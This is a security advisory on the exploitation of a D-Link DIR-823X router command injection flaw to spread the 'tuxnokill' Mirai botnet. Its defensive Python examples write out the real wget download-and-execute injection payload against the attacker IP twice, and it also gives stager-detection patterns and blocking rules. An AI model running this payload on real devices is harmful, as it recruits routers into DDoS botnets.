Threat actors are actively exploiting a command injection vulnerability in discontinued D-Link DIR-823X routers to deploy a Mirai botnet variant dubbed “tuxnokill”, and organizations still running these legacy devices are directly in the crosshairs.
CVE-2025-29635: Mirai Botnet Hits Retired D-Link
CVE-2025-29635 is a command injection vulnerability (CWE-77) residing in D-Link DIR-823X series routers running firmware versions 240126 and 240802.
The flaw allows an authorized attacker to execute arbitrary operating system commands on a remote device by sending a specially crafted HTTP POST request to the /goform/set_prohibiting endpoint.
The vulnerability was discovered and reported in early 2025 by researchers who reverse-engineered the sub_42232C function in the router’s binary. They found that the value of the macaddr parameter is copied into a command buffer via snprintf, after which system() is called on that buffer, so a maliciously crafted macaddr value gives an attacker direct shell access.
The vulnerability was publicly disclosed in late March 2025, and a proof-of-concept (PoC) exploit was briefly published on GitHub before being removed.
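To make the snprintf-then-system() pattern concrete, the following Python model (an added example, not the firmware’s code or the researchers’ PoC) shows the flawed handler next to a hardened one. The command name `/sbin/prohibit_mac` is hypothetical, since the article does not say what the real handler executes, and both request bodies are constructed. The hardened version looks the field up by name, allow-lists the value as a canonical MAC address, and returns an argv list for an exec-style call so that no shell ever parses it:

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote_plus, urlencode

# Hypothetical command the handler runs on the supplied MAC; the article does
# not name the real one behind sub_42232C, so this stands in for it.
PROHIBIT_CMD = "/sbin/prohibit_mac"

# Canonical colon-separated MAC address. Nothing else is accepted.
MAC_RE = re.compile(r"[0-9A-Fa-f]{2}(:[0-9A-Fa-f]{2}){5}")

# Constructed request bodies (not captured traffic). The hostile one has the
# shape described in the article: the stage-one download chain sits under a
# field that is not macaddr.
INJECTED_BODY = urlencode({
    "parameter": ";cd /tmp;wget http://88.214.20.14/dlink.sh;chmod +x dlink.sh;./dlink.sh"
})
BENIGN_BODY = urlencode({"macaddr": "00:11:22:33:44:55"})


def parse_body(body: str) -> List[Tuple[str, str]]:
    """Split an application/x-www-form-urlencoded body on '&' only and decode
    each side. urllib.parse.parse_qs also splits on ';' in older Pythons,
    which would hide exactly the payload we care about here."""
    pairs = []
    for part in body.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs


def vulnerable_command(body: str) -> str:
    """Model of the flawed handler: the first value in the body is formatted
    into the command buffer (the snprintf step) and the result is what
    system() would receive. The field name is never checked, so any key works
    and every shell metacharacter in the value is honoured."""
    pairs = parse_body(body)
    value = pairs[0][1] if pairs else ""
    return f"{PROHIBIT_CMD} {value}"


def hardened_command(body: str) -> Optional[List[str]]:
    """Hardened form: look up macaddr by name, accept only a canonical MAC and
    return an argv list for an exec-style call, so no shell ever parses the
    value. None means the request must be rejected."""
    values = [v for k, v in parse_body(body) if k == "macaddr"]
    if len(values) != 1 or not MAC_RE.fullmatch(values[0]):
        return None
    return [PROHIBIT_CMD, values[0]]


if __name__ == "__main__":
    print("vulnerable:", vulnerable_command(INJECTED_BODY))
    print("hardened  :", hardened_command(INJECTED_BODY))
    print("hardened  :", hardened_command(BENIGN_BODY))
```

The allow-list is the important part: escaping or stripping metacharacters from the value would still leave system() in the loop, whereas a fixed-format MAC passed as a separate argv element gives the attacker nothing to break out of.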
Critically, these routers were officially retired by D-Link in September 2025, meaning no patch will ever be issued for this flaw. As of this writing, CVE-2025-29635 has not yet been added to CISA’s Known Exploited Vulnerabilities (KEV) Catalog but active exploitation has now begun.
Active Exploitation in March 2026
Researchers first observed active exploitation attempts targeting CVE-2025-29635 in a global honeypot network in early March 2026.
This marks the first confirmed in-the-wild exploitation since the CVE’s initial disclosure over a year earlier, a classic example of “slow burn” threat actor adoption of public PoC exploits.
The observed exploitation payload deviates from the original PoC in significant ways. The attacker’s HTTP POST request omits standard headers such as Referer and Accept-Language, and provides no session authentication tokens.
The malicious payload is injected not under the expected macaddr field but under an arbitrary field named "parameter", suggesting the router’s firmware never checks which form field is mapped into the macaddr command buffer.
In other words, the router copies the value of whatever key-value pair it finds in the POST body straight into the command buffer without verifying the field name, which makes the attack trivially flexible.
The payload chain follows a well-known multi-stage delivery pattern: it attempts to cd into writable directories (/tmp, /var/run, /root), then downloads a shell script (dlink.sh) from attacker-controlled IP 88.214.20[.]14 via wget, curl, and tftp, before making it executable and running it.
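The request shape described above is easy to pick out of web-server or honeypot logs without depending on the field name. The following detector is an added example (not Akamai’s rules and not code from the article) that runs over constructed JSON-lines request records: it decodes every form value of a POST to a /goform/ endpoint, looks for shell metacharacters and the loader vocabulary (fetch tool, writable-directory hop, chmod, execute), notes a set_prohibiting request with no macaddr field at all, and adds the missing Referer/session-cookie signal the article calls out. The log format is an assumption for the example:

```python
import json
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote_plus, urlsplit

# Constructed request records in JSON-lines form (not real captures). Line 1
# mirrors the shape described above: POST to set_prohibiting, no Referer or
# Cookie, stage-one download chain under a field that is not macaddr.
SAMPLE_LOG = """\
{"src": "198.51.100.7", "method": "POST", "uri": "/goform/set_prohibiting", "headers": {"Host": "192.0.2.1", "Content-Type": "application/x-www-form-urlencoded"}, "body": "parameter=%3Bcd+%2Ftmp%3Bwget+http%3A%2F%2F88.214.20.14%2Fdlink.sh%3Bchmod+%2Bx+dlink.sh%3B.%2Fdlink.sh"}
{"src": "192.0.2.50", "method": "POST", "uri": "/goform/set_prohibiting", "headers": {"Host": "192.0.2.1", "Referer": "http://192.0.2.1/prohibit.html", "Cookie": "sessionid=c0ffee01", "Content-Type": "application/x-www-form-urlencoded"}, "body": "macaddr=00%3A11%3A22%3A33%3A44%3A55&enable=1"}
{"src": "192.0.2.51", "method": "GET", "uri": "/goform/get_status?x=1", "headers": {"Host": "192.0.2.1"}, "body": ""}
"""

# Shell metacharacters and command separators that have no business in a MAC.
SHELL_META = re.compile(r"[;|&`]|\$\(")
# Stage-one loader vocabulary: fetch tool, writable-dir hop, chmod, execute.
STAGER = re.compile(
    r"\b(wget|curl|tftp|busybox)\b|\bcd\s+/(tmp|var/run|root)\b|\bchmod\s+\+x\b|\./\S+\.sh\b"
)


def split_form(raw_body: str) -> Tuple[List[str], List[str]]:
    """Return (keys, decoded values). Decoding per value, not per body, keeps
    the '&' separators from being mistaken for shell operators."""
    keys, values = [], []
    for part in raw_body.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        keys.append(unquote_plus(key))
        values.append(unquote_plus(value))
    return keys, values


def inspect_request(rec: Dict) -> List[str]:
    """Reasons this record looks like CVE-2025-29635 abuse; empty if clean."""
    reasons = []
    path = urlsplit(rec["uri"]).path
    if rec["method"] != "POST" or not path.startswith("/goform/"):
        return reasons
    keys, values = split_form(rec.get("body", ""))
    if any(SHELL_META.search(v) for v in values):
        reasons.append("shell metacharacters in a form value")
    if any(STAGER.search(v) for v in values):
        reasons.append("download/stager commands in a form value")
    if path == "/goform/set_prohibiting" and "macaddr" not in keys:
        reasons.append("set_prohibiting request without a macaddr field")
    headers = {k.lower() for k in rec.get("headers", {})}
    if reasons and not ({"referer", "cookie"} & headers):
        reasons.append("no Referer and no session cookie")
    return reasons


def scan_log(text: str) -> List[Tuple[int, str, List[str]]]:
    """(line number, source IP, reasons) for every suspicious record."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        rec = json.loads(line)
        reasons = inspect_request(rec)
        if reasons:
            hits.append((lineno, rec["src"], reasons))
    return hits


if __name__ == "__main__":
    for lineno, src, reasons in scan_log(SAMPLE_LOG):
        print(f"line {lineno} from {src}: " + "; ".join(reasons))
```

The header check is deliberately only applied once a body-content reason exists; plenty of legitimate automation omits Referer, so on its own it would be noise.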
The “tuxnokill” Mirai Variant
The downloaded shell script fetches and executes a Mirai malware payload named “tuxnokill”, which is built for multiple CPU architectures, a hallmark of botnets targeting the diverse IoT ecosystem. FortiGuard Labs has also confirmed the attack pattern targeting these exact firmware versions.
Key technical characteristics of the tuxnokill malware include:
- XOR encoding with a decryption key of 0x30, consistent with Mirai source-code derivatives
- Hard-coded C2 server: 64.89.161[.]130 on port 44300
- Hard-coded downloader IP: 88.214.20[.]14
- Mirai signature string: "segmentation fault (core dumped)", a standard console execution string in Mirai payloads
- Anti-AI string: "AI.NEEDS.TO.DIE" hard-coded in the binary, suggesting the threat actor coded the payload manually rather than using AI-assisted development
The malware supports an extensive suite of DDoS attack commands, including TCP STOMP, TCP ACK, TCP SYN, UDP DNS, UDP PLAIN, GRE ETH, HTTP NULL, XMAS, and RAW flood attacks, giving the operator a versatile arsenal for volumetric attacks.
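Because a single-byte XOR keeps every byte at its original offset, the strings listed above can be recovered from a binary simply by XOR-ing the whole image with 0x30 and running a `strings`-style scan over the result. The script below is an added example (not Akamai’s YARA rule and not taken from the article) that builds a constructed stand-in for a tuxnokill-style ELF with the markers stored XOR-0x30 encoded, then shows the decode, the marker search in both encoded and plaintext form, and a conservative classifier that needs the Mirai console string plus a tuxnokill-specific marker before it fires:

```python
import re
from typing import Dict, List, Tuple

XOR_KEY = 0x30

# Strings the article reports in the tuxnokill binary, plus the two IPs.
MARKERS = {
    "mirai_console": b"segmentation fault (core dumped)",
    "anti_ai": b"AI.NEEDS.TO.DIE",
    "c2_ip": b"64.89.161.130",
    "downloader_ip": b"88.214.20.14",
}

PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{6,}")


def xor_bytes(data: bytes, key: int = XOR_KEY) -> bytes:
    """Single-byte XOR is its own inverse, so this both encodes and decodes."""
    return bytes(b ^ key for b in data)


def build_sample() -> bytes:
    """Constructed stand-in for a tuxnokill-style ELF (not a real sample): an
    ELF magic, some padding, each marker stored XOR-0x30 encoded, and one
    plaintext string. The separator byte 0x30 decodes to NUL, which keeps the
    decoded entries apart."""
    sep = bytes([XOR_KEY]) * 4
    blob = bytearray(b"\x7fELF" + b"\x00" * 60 + sep)
    for marker in MARKERS.values():
        blob += xor_bytes(marker) + sep
    blob += b"plain text stays plain"
    return bytes(blob)


SAMPLE = build_sample()


def decoded_strings(blob: bytes, key: int = XOR_KEY) -> List[str]:
    """'strings' over the XOR-decoded image: printable runs of 6+ bytes."""
    return [m.group().decode("ascii") for m in PRINTABLE_RUN.finditer(xor_bytes(blob, key))]


def find_markers(blob: bytes, key: int = XOR_KEY) -> Dict[str, Tuple[str, int]]:
    """Which markers appear, how (xor-encoded or plain) and at what offset.
    A single-byte XOR keeps offsets aligned, so decoding the whole image and
    searching it is equivalent to searching for the encoded form."""
    decoded = xor_bytes(blob, key)
    found = {}
    for name, marker in MARKERS.items():
        if marker in decoded:
            found[name] = ("xor-0x%02x" % key, decoded.find(marker))
        elif marker in blob:
            found[name] = ("plain", blob.find(marker))
    return found


def is_tuxnokill_like(blob: bytes) -> bool:
    """Require the Mirai console string plus at least one tuxnokill-specific
    marker, so generic Mirai builds do not trip it."""
    found = find_markers(blob)
    return "mirai_console" in found and bool({"anti_ai", "c2_ip"} & set(found))


if __name__ == "__main__":
    for s in decoded_strings(SAMPLE):
        print(repr(s))
    print(find_markers(SAMPLE))
    print("tuxnokill-like:", is_tuxnokill_like(SAMPLE))
```

On a real sample, run `find_markers` over the whole file; if the operator rebuilds with a different key, `decoded_strings(blob, key)` for each of the 255 non-zero keys, looking for the console string, recovers it quickly because the search space is tiny.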
TP-Link and ZTE Also Targeted
This threat actor is not limiting their operations to D-Link infrastructure. The same researchers recorded simultaneous exploitation attempts against two additional vulnerabilities from the same attacker IP:
- CVE-2023-1389 – A known command injection flaw in TP-Link Archer AX21 routers, exploited via the /cgi-bin/luci/;stok=/local?form=country endpoint
- ZTE ZXV10 H108L RCE – A remote code execution exploit targeting ZTE routers via the /manager_dev_ping_t endpoint on port 8083
All three attack chains download payloads from the same IP (88.214.20[.]14), pointing to a single coordinated threat actor running a multi-platform botnet recruitment campaign.
Defenders should immediately block or alert on the following indicators:
| IOC Type | Value |
|---|---|
| Malicious IP (Downloader) | 88.214.20[.]14 |
| Malicious IP (C2) | 64.89.161[.]130 |
| C2 Port | 44300 |
| SHA256 Hash | 32ca4b70e84787144574bfdb85a0092f3ebf524bb78febdd28d4c832b53fe100 |
| SHA256 Hash | be902e86ec68515e23a3387a21e80d098d258223ce562598c27ee6d89b83ff2b |
| SHA256 Hash | d232c0960f24ba4bb369821b1bf2836d9e576a34fa3ddca2618c80b2f54277f7 |
| SHA256 Hash | 7792f5c1d5c6c6415732ba0f63328549e19cc9c182c258c17b97b77fdb5541b8 |
| SHA256 Hash | 72eff03b8573329818b38185074aa763e99d15f5709fecc44f9afece21dc06d8 |
Akamai has published Snort rules (SID: 2000003) and YARA rules detecting the above strings and IPs across network traffic and scanned binaries.
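The indicators in the table are simple to operationalize against flow telemetry and file-hash inventories. The block below is an added example (not Akamai’s Snort or YARA rules and not code from the article): it matches constructed flow records against the downloader and C2 IPs, treats the bare C2 port on any other destination as a low-confidence lead rather than a block, normalizes hash case before comparing against the SHA256 list, and emits the corresponding iptables egress blocks. The flow-record format and the hash list are assumptions for the example:

```python
import re
from typing import Dict, Iterable, List, Set

# Network IOCs from the table above.
IOC_IPS: Dict[str, str] = {
    "88.214.20.14": "downloader",
    "64.89.161.130": "C2",
}
C2_PORT = 44300

# File IOCs from the table above, kept lowercase for comparison.
IOC_SHA256: Set[str] = {
    "32ca4b70e84787144574bfdb85a0092f3ebf524bb78febdd28d4c832b53fe100",
    "be902e86ec68515e23a3387a21e80d098d258223ce562598c27ee6d89b83ff2b",
    "d232c0960f24ba4bb369821b1bf2836d9e576a34fa3ddca2618c80b2f54277f7",
    "7792f5c1d5c6c6415732ba0f63328549e19cc9c182c258c17b97b77fdb5541b8",
    "72eff03b8573329818b38185074aa763e99d15f5709fecc44f9afece21dc06d8",
}

# Constructed flow records (not real telemetry): "timestamp src:sport -> dst:dport proto".
SAMPLE_FLOWS = """\
2026-03-04T10:15:02Z 192.0.2.1:49152 -> 88.214.20.14:80 tcp
2026-03-04T10:15:09Z 192.0.2.1:49153 -> 64.89.161.130:44300 tcp
2026-03-04T10:16:00Z 192.0.2.2:53210 -> 203.0.113.9:443 tcp
2026-03-04T10:16:30Z 192.0.2.3:53211 -> 203.0.113.10:44300 tcp
"""
FLOW_RE = re.compile(r"^(\S+) (\S+):(\d+) -> (\S+):(\d+) (\w+)$")

# Constructed hash list, e.g. from a device file-system dump: one IOC hash in
# upper case and one unrelated hash.
SAMPLE_HASHES = [
    "32CA4B70E84787144574BFDB85A0092F3EBF524BB78FEBDD28D4C832B53FE100",
    "0000000000000000000000000000000000000000000000000000000000000000",
]


def match_flows(text: str) -> List[Dict]:
    """One record per flow touching an IOC. A destination IP hit is high
    confidence; the bare C2 port on another IP is low confidence and worth a
    look rather than a block."""
    hits = []
    for line in text.splitlines():
        m = FLOW_RE.match(line)
        if not m:
            continue
        ts, src, _sport, dst, dport, _proto = m.groups()
        dport = int(dport)
        if dst in IOC_IPS:
            hits.append({"ts": ts, "src": src, "dst": dst, "dport": dport,
                         "ioc": IOC_IPS[dst], "confidence": "high"})
        elif dport == C2_PORT:
            hits.append({"ts": ts, "src": src, "dst": dst, "dport": dport,
                         "ioc": "C2 port only", "confidence": "low"})
    return hits


def match_hashes(hashes: Iterable[str]) -> Set[str]:
    """Hashes in the input that match a known tuxnokill sample, normalised to
    lowercase so case differences between tools do not hide a match."""
    return {h.strip().lower() for h in hashes} & IOC_SHA256


def iptables_rules() -> List[str]:
    """Egress blocks for the IOC IPs on a Linux gateway: OUTPUT covers the
    host itself, FORWARD covers traffic it routes for the LAN."""
    rules = []
    for ip in IOC_IPS:
        for chain in ("OUTPUT", "FORWARD"):
            rules.append(f"iptables -I {chain} -d {ip} -j DROP")
    return rules


if __name__ == "__main__":
    for hit in match_flows(SAMPLE_FLOWS):
        print(hit)
    print("hash matches:", match_hashes(SAMPLE_HASHES))
    print("\n".join(iptables_rules()))
```

A source IP that appears in a high-confidence hit is a router to pull from the network, not just a flow to drop: by the time it reaches the C2 on 44300 the stage-one script has already run.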
Mitigation and Recommendations
Organizations should take the following steps immediately:
- Replace D-Link DIR-823X routers immediately; no firmware patch exists or will be issued for this end-of-life device
- Block outbound connections to 88.214.20[.]14 and 64.89.161[.]130 at the firewall level
- Deploy the Akamai YARA and Snort rules to detect tuxnokill infections in your environment
- Audit legacy router inventory and prioritize replacement of any EOL networking hardware with internet exposure
- Monitor /goform/ endpoints on network devices for anomalous POST requests
- Apply CVE-2023-1389 patches to all TP-Link Archer AX21 devices if not already done
The pattern here is familiar: a public PoC sits dormant, EOL devices remain deployed, and eventually a botnet operator weaponizes the exploit at scale.
The low barrier to entry in the Mirai ecosystem, where the source code has been public since 2016, means even technically unsophisticated actors can run large-scale DDoS infrastructure.
FAQ
Q1: Is CVE-2025-29635 patched?
No, D-Link officially retired the DIR-823X series in September 2025, so no patch will ever be released; immediate device replacement is the only fix.
Q2: What does the tuxnokill malware do?
It recruits compromised routers into a Mirai-based DDoS botnet capable of launching TCP, UDP, HTTP, and GRE flood attacks against targets worldwide.
Q3: Do attackers need valid credentials to exploit CVE-2025-29635?
While the CVE technically requires an “authorized attacker,” active exploits observed omit authentication tokens entirely, suggesting the firmware does not enforce credential validation.
Q4: Is this vulnerability in CISA’s KEV Catalog?
As of April 2026, CVE-2025-29635 has not been added to CISA’s Known Exploited Vulnerabilities Catalog, though active exploitation has now been confirmed.
Site: thecybrdef.com